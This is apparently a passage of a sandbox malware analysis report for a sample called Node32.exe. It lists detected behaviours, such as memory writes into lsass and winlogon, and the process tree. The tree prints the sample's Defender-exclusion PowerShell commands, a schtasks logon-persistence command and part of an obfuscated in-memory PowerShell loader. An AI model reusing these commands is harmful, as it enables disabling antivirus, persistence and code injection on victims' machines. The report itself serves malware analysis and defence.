persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3816 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3816 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3816 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\schtasks.exe
PID 3816 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\schtasks.exe
PID 3816 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\$Node32.exe
PID 3816 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\$Node32.exe
PID 3816 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\$Node32.exe
PID 3816 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3816 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3816 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\schtasks.exe
PID 3816 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\schtasks.exe
PID 3816 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\$Node2Json.exe
PID 3816 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\$Node2Json.exe
PID 3816 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3816 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3816 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\schtasks.exe
PID 3816 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\schtasks.exe
PID 3816 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\$Node3Json.exe
PID 3816 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe C:\Windows\System32\$Node3Json.exe
PID 1704 wrote to memory of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1704 wrote to memory of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1704 wrote to memory of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1704 wrote to memory of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1704 wrote to memory of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1704 wrote to memory of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1704 wrote to memory of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1704 wrote to memory of 1692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1692 wrote to memory of 632 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1692 wrote to memory of 684 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1692 wrote to memory of 964 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 480 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 424 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 1692 wrote to memory of 884 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1036 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1124 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 1208 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1264 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1424 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1472 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1484 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1508 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 1640 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1684 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 1728 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 1812 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 1824 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 1952 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 1964 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 1992 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 2004 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 2116 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 2228 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 1692 wrote to memory of 2280 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 2332 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 2360 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1692 wrote to memory of 2648 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 2656 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 2752 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 2852 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1692 wrote to memory of 2880 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 1692 wrote to memory of 2904 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe c433d048eb1e844cc12215c24ac88b7f P7kiv3bMr0C2WxY/1AC6qw.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST

C:\Windows\System32\$Node32.exe

"C:\Windows\System32\$Node32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:MlddtWyOVLTW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JUtmYuQkexpjJE,[Parameter(Position=1)][Type]$KnTJBWhiuA)$QWnwIixgpdT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+'la'+'s'+'s,'+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'Se'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+'la'+'s'+'s'+','+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QWnwIixgpdT.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+'e'+'B'+'ySig,Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$JUtmYuQkexpjJE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$QWnwIixgpdT.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$KnTJBWhiuA,$JUtmYuQkexpjJE).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+''+'g'+''+'e'+'d');Write-Output $QWnwIixgpdT.CreateType();}$mSwoYymFuWlVE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 